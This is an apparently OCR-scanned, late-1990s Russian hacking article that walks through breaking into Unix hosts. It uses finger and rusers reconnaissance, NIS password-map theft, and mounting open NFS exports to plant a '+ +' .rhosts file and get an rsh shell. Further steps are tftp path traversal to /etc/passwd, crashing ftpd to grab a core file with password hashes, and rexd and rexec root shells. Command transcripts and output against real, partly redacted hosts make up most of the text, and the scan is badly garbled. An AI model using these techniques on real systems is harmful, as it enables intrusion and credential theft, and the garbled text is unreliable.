Учись администрировать Windows 2000!
Login Name
Kuzmenko Vladimir Kizmenko kuzmenko Vladimir Kizmenko milichen Yuri Mulichenko
Sherbak Eugeny Scherbkov
TTY Idle When pO 4:57 Sun 08:25 pi 2:38 Sun 08:26 p4 4:59 Fri 19:41 p5 5:00 Sat 10:18
Office
ЗВ/Г410 1-35-13 221Д448 1-77-33
Devil# finger Yur@ccsix. xxxx. xxxx. ru [ccsix. xxxx. xxxx. ru]
Login: yur Name: Yuri A. Podgorodsky
Directory: /home/yur Shell: /bin/bash
On since Sat Apr 12 12:24 (MSK) on ttypO from jannet. xxxx. xxxx
|
When |
|
Idle |
|
2 10:32 5 10:20 |
|
17:37 17:32 25:55 |
|
Apr Apr |
|
Apr 2 11:21 Apr 2 10:33 97:11 |
3 hours 35 minutes idle Mail forwarded to yur@jannet. xxxx. xxxx. ru No mail. No Plan.
Devil# rusers -1 unisun. xxxxx-xxx. net Login Name TTY
Host
Lavrov unisun. xxxxx-xxx:console
Sun unisun. xxxxx-xxx:ttypO
(mskws. desy. de)
Lavrov unisun. xxxxx-xxx:ttypl
Lavrov unisun. xxxxx-xxx :ttyp2
Эти сервисы дают нам аккаунты, позволяют нам узнать кто в данный момент работает в системе, их shell и домашний каталог, возможно имена доверенных хостов. Обратите внимание на графу Idle, если в ней стоит несколько часов, то скорее всего в данный момент никто не обратит на вас внимание.
2. rpcinfo
|
Program |
Version |
Netid |
Address |
Service |
Owner |
|||||
|
100000 |
2 |
Tcp |
- 0 |
0 |
0 |
0 |
0. |
111 |
Rpcbind |
Unknown |
|
100000 |
2 |
Udp |
0 |
0 |
0 |
0 |
0. |
111 |
Rpcbind |
Unknown |
|
100004 |
2 |
Udp |
0 |
0 |
0 |
0 |
2. |
150 |
Ypserv |
Unknown |
|
100004 |
2 |
Tcp |
0 |
0 |
0 |
0 |
2. |
151 |
Ypserv |
Unknown |
|
100004 |
1 |
Udp |
0 |
0 |
0 |
0 |
2. |
150 |
Ypserv |
Unknown |
|
100004 |
1 |
Tcp |
0 |
0 |
0 |
0 |
2. |
151 |
Ypserv |
Unknown |
|
100069 |
1 |
Udp |
0 |
0 |
0 |
0 |
2. |
152 |
Unknown |
|
|
100069 |
1 |
Tcp |
0 |
0 |
0 |
0 |
2. |
5 1 |
- |
Unknown |
|
100007 |
2 |
Tcp |
0 |
0 |
0 |
0 |
4 |
0 |
Ypbind |
Unknown |
|
100007 |
2 |
Udp |
0 |
0 |
0 |
0 |
4 |
3 |
Ypbind |
Unknown |
|
100007 |
1 |
Tcp |
0 |
0 |
0 |
0 |
4 |
0 |
Ypbind |
Unknown |
|
100007 |
1 |
Udp |
0 |
0 |
0 |
0 |
4 |
3 |
Ypbind |
Unknown |
|
100028 |
1 |
Tcp |
0 |
0 |
0 |
0 |
2 |
5 1 |
Ypupdated |
Unknown |
|
100028 |
1 |
Udp |
0 |
0 |
0 |
0 |
2 |
158 |
Ypupdated |
Unknown |
|
100009 |
1 |
Udp |
0 |
0 |
0 |
0 |
3 |
255 |
Yppasswdd |
Unknown |
|
Devil# rpcinfo |
|
SUn10.XXX, XXX. su |
|
100029 |
1 |
Udp |
0 |
0 |
0 |
0 2 |
159 |
Keyserv |
Unknown |
|
100003 |
2 |
Udp |
0 |
0 |
0 |
0 8 |
.1 |
Nfs |
Unknown |
|
100005 |
1 |
Udp |
0 |
0 |
0 |
0 2 |
.223 |
Raountd |
Unknown |
|
100005 |
2 |
Udp |
0 |
0 |
0 |
0 2 |
.223 |
Mountd |
Unknown |
|
100005 |
1 |
Tcp |
0 |
0 |
0 |
0 2 |
.226 |
Mountd |
Unknown |
|
100005 |
2 |
Tcp |
0 |
0 |
0 |
0 2 |
.226 |
Mountd |
Unknown |
|
100024 |
1 |
Udp |
0 |
0 |
0 |
0 2 |
.226 |
Status |
Unknown |
|
100024 |
1 |
Tcp |
0 |
0 |
0 |
0 2 |
.228 |
Status |
Unknown |
|
100021 |
1 |
Tcp |
0 |
0 |
0 |
0 2 |
.229 |
Nlockmgr |
Unknown |
Rpcinfo дает информацию о запущенных RPC сервисах. Наиболее интересны из них mountd, nisd, ypserv и ypbind, statd, boot pa ram, pcnfsd, rexd. statd позволяет стереть удаленно любой файл, pcnfsd и mountd дают доступ к дискам машины, rexd — удаленное выполнение команд.
3. NIS (nisd, ypbind, ypserv)
Если эта машина является NIS сервером, то зная NIS имя домена вы можете получить любые N IS карты простым грс запросом. Обычно это имя совпадает с именем домена и можно попытаться его угадать:
Devil# ypx - dg sunlo. xxx. xxx. su Trying domain sun10,xxx. xxx. su Trying domain sunio Trying domain xxx. xxx. su sysdiag:*:0:1:0ld System
Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/
Sundiag/sundiag
Sybase:*:13:55:syb:/usr/nros/sybase:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/:
Audit:*: 9:9::/etc/security/audit:/bin/csh uucp:*:4:8::/var/spool/uucppublic:
Sync:__ F324VMRDcL6: 1:1:: /:/bin/sync
Root:_Ye. Ibw. 8uQg: 0:3: Ope rator: /: /bin/csh news:*:6:6::/var/spool/news:/bin/csh sys:*:2:2::/:/bin/csh
Snm:_ 7ck. pfEh/2s:11:11:Network Manager:/usr/snm:/bin/csh
Rom:__ IriAsoksSeE:10:10:Victor Romanchik:/usr/rom:/bin/csh
Nms:*:12:55:Network Manager:/usr/nms:/bin/csh
Bin:*:3:3::/bin:
YP map transfer successful]..
Мы заменили первые два символа каждого пароля на «_____ » и изменили имена здесь и далее в тексте.
Если угадать NIS имя домена не удается, возможно получить его через bootparam сервис или подсмотреть в директории /var/yp, если она доступна публично.
4. showmount
Devil# showmount - e thsunl, xxxx. xxxxx. su export list for thsun1.xxxx. xxxxx. su:
/pub /opt
/pgm/linux
/export /usr
/tftpboot
/cdrom/sol_2_3_hw894_sparc/s0
/home
(everyone)
Thsun2,thsun3,tlx39
(everyone) (everyone) (everyone) (everyone) (everyone) (everyone) (everyone)
С помощью showmount мы узнали о разделах, предоставляемых этим хостом, о правах доступа к ним и возможно о доверенных хостах. Такие важные каталоги как export, home, usr доступны всем! Попробуем... devil# mount - F nfs thsunl. xxxx. xxxxx. su:/home /mnt devils cd /mnt devil» 1$ - al total 12524
|
Drwxr-xr-x |
17 |
Root |
Root |
1024Jun 28 1996 . |
|
Drwxr-xr-x |
28 |
Root |
Root |
1024 Apr 12 16:29 ,. |
|
Drwxr-xr-x |
2 |
Root |
Root |
512 May 19 1995 TT_DB |
|
Drwxr-xr-x |
3 |
Root |
798 |
512 Nov 25 1 994 cfi |
|
Drwxr-xr-x |
6 |
Root |
100 |
512 Nov 25 1994 dug |
|
Drwxr-xr-x |
9 |
Root |
Other |
512 Feb 17 11:19 lcta |
|
Drwxr-xr-x |
3 |
Root |
Other |
512 Jun 19 1996 lhep |
|
Drwxr-xr-x |
6 |
Root |
Other |
512 Feb 14 11:16 lnp |
|
Drwxr-xr-x |
6 |
Root |
Other |
512 Feb 14 11:19 lnup |
|
Drwxr-xr-x |
4 |
Root |
Other |
512 Jan 15 1995 lnur |
|
Devil» cd |
Lnup |
|||
|
Devil# Is |
-al |
|||
|
Total 12 |
||||
|
Drwxr-xr-x |
6 |
Root |
Other |
512 Feb 14 11:19 . |
|
Drwxr-xr-x |
17 |
Root |
Root |
1024 Jun 28 1 996 .. |
|
Drwxr-xr-x |
3 |
6000 |
600 |
512 Oct 30 1995 dolbilov |
|
Drwxr-xr-x |
9 |
6190 |
600 |
1024 Oct 7 1996 davgun |
|
Drwxr-xr-x |
4 |
6001 |
600 |
512 Oct 20 1995 gvf |
|
Drwxr-xr-x |
4 |
6003 |
600 |
512 Apr 4 10:31 yup |
|
Devil» echo 'dolbilov: |
:600:' » |
/etc/groups |
|
Devil» echo ' dolbilov: x: 6000:600:: /noway: /bin/csh' » /etc/passwd devil# su dolbilov |
$ cd dolbilov $ Is - al total 30 drwxr-xr-x drwxr-xr-x -rw-r~r— - rw-r—Г-- - rw-r—r— - rw-r--г— - rw
Drwxr-xr-x $ echo '+ +' $ exit
Devil# rsh -1 dolbilov thsun1.xxxx. xxxxx. su /bin/csh - i
|
Dolbilov dolbilov 512 Apr 12 16:21 . Root other 512 Feb 14 11:19 .. Dolbilov dolbilov 2901 Apr 7 1993 ,,cshrc Dolbilov dolbilov 1550 Apr 7 1993 ..login Dolbilov dolbilov 2750 Apr 7 1993 ,, rootmenu Dolbilov dolbilov 478 Apr 7 1993 .sunview Dolbilov dolbilov 2196 Oct 30 1995 mbox Dolbilov dolbilov 512 Nov 25 1994 timezone, rhosts |
|
5. |
Таким образом мы получили shell на удаленной машине. sendmail
Devil* telnet www. ххх. ru 25 Trying 193.124. xxx. xx.. Connected to Www. xxx. ru.
Escape character is '"]'.
220 Www. xxx. ru ESMTP Sendmail 8.8.5/8.8.5; Sat, 12 Apr 1997 15:55:36 +0400 vrfy serg
550 serg... User unknown vrfy alex
250 Alexei E. Katov <ALEX@WWW. XXX. RU
Так мы попытались угадать несколько системных аккаунтов и конечно записали версию sendmail'a — программы, содержащей легендарное количество ошибок. Не будем заострять на них внимания. Новые версии выходят регулярно, старые ошибки исправляются, появляются новые.
Tftp широко известная программа похожая на ftp, служит для простейшего трансфера файлов. Ошибки в ней известны и исправлены в большинстве ОС, но и нижеследующий пример можно встретить: devil# tfp Www. xxx. ru
Tftp> get Дшр/../../../../../../../../. ./etc/passwd /tmp/passwd
Tftp > quit devil#
Сервис ftp является не только удобным, но и опасным для вашей системы. Опасность представляет не только возможность украсть доверенную информацию или занести свою при неправильной конфигурации демона. Опасность представляет возможное крушение демона командами пользователя.
Devil# ftp ххххххххххх. ххх, com Connected to ххххххххххх. ххх, com.
220 xxxxxxxxxxx FTP server (UNIX(r) System V Release 4.0) ready.
Name (xxxxxxxxxxx. xxx. com: root): ftp
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
Ftp> user root ■ ■
530 User root unknown.
Login failed.
Ftp> user root
530 User root unknown.
Login failed.
Ftp> user foobar
530 User foobar access denied.
Login failed.
Ftp> quote pasv
421 Service not available, remote server has closed connection ftp> о xxxxxxxxxxx. xxx. com Connected to xxxxxxxxxxx. xxx. com.
220 xxxxxxxxxxx FTP server (UNIX(r) System V Release 4.0) ready. Name (xxxxxxxxxxx. xxx. com: root): ftp
331 Guest login ok, send ident as password. Password:
230 Guest login ok, access restrictions apply. ftp> bin
200 Type set to I. ftp> get core
200 PORT command successful.
150 Binary data connection for core (194.xx. xxx, xxx, 51553) (281136 bytes).
226 Binary Transfer complete. local: core remote: core
281136 bytes received in 16 seconds (17 Kbytes/s) ftp> bye
221 Goodbye. devil#
/********** Fragment of core ************/ .... 994:.. S.:.
Srk:___ a2U/fw. FWhk:....::::.. S
Ha rat: __mQb7Pi j 8m rA:....::::.. S@ kchu:__/sPKnswJ8y2:9....::::. .S' yhew:__0/L6foNhPoA:9....:::: . .S. :h6qh9see7ry. M:9353:....:. pa. .S. WGZ/NEzsLjwe 2:9097::. . .. flo. .S. Xbra. Omg/PMc :9097:::.... dave.. S. OVnEOzICamE: 9097::::....
TOC o "1-3" h z on:2 ,.T. VqQ02B0U:909 7::::::.......... :
/****************************************/
Мы заменили первые два символа каждого пароля на «_____ ».
8. rexd
devil» su daemon
$ on - i faxnetxx, xxx. ru /bin/sh - i $ uname - a
Faxnetxx faxnetxx 3.2 2 І386 $ id
Uid=1(daemon) gid=1(other) $
9. Сканирование портов
Портмэппер сообщает только о грс сервисах. Об остальных запущенных сервисах можно узнать прямым сканированием портов. Приведем только наиболее важные порты:
X server
X сервер базируется на портах 6000 + номер дисплея. Если X сервер не использует дня аутентификации magic cookies или защита отключена командой xhost +, информация с его дисплеев может быть подсмотрена или украдена, нажатия клавиш записаны, программы запущены удаленно (xspy, xpush). Если хост поддерживает соединение к 6000 порту, то это может быть использовано для denial_of_service атак.
Rlogin и talkd
В большинстве систем эти сервисы имеют ошибки, связанные с переполнением буфера, rlogin пытается получить от удаленной системы переменную TERM, a talkd — узнать имя хоста, требующего соединение. Если эти демоны получают в ответ строку большой длинны, то происходит переполнение буфера. Это дает возможность выполнить удаленно команды с привилегиями root.
Rsh и rexec
Rsh и rexec позволяют получить командную оболочку не оставляя записей в log-файлах. Кроме того, эти сервисы не отслеживают запрет на удаленный root логин (/etc/default/login).
Devil# rsh -1 smtp xxxx. xxx. ru /bin/csh - i Warning: no access to tty; thus no job control in this shell... # id
Uid=0(root) gid=0(root) devil# nc - v xxxx. xxx. ru 512 xxxx. xxx. ru [194.85.xxx. xxx] 512 (exec) open "@root~@rootpasswd~@/bin/csh - i~@
Warning: no access to tty; thus no job control in this, shell... # id
Uid=0(root) gid=1(other) 10. Доверенные хосты
Обычно, работая в пределах одной группы, пользователям разрешается без пароля входить на соседние компьютеры. Такие доверительные машины указываются в файлах. rhosts и hosts. equiv. Предположить, какие хосты являются доверенными, можно отслеживая откуда наиболее часто заходят пользователи, особенно администраторы, просматривая права на доступ к NFS разделам. Использование доверительных отношений создает определенное удобство, но вместе с тем порождает опасность проникновения в систему злоумышленников. Взломщик может исказить информацию в DNS или NIS сервере и выдавать себя за доверенный хост.
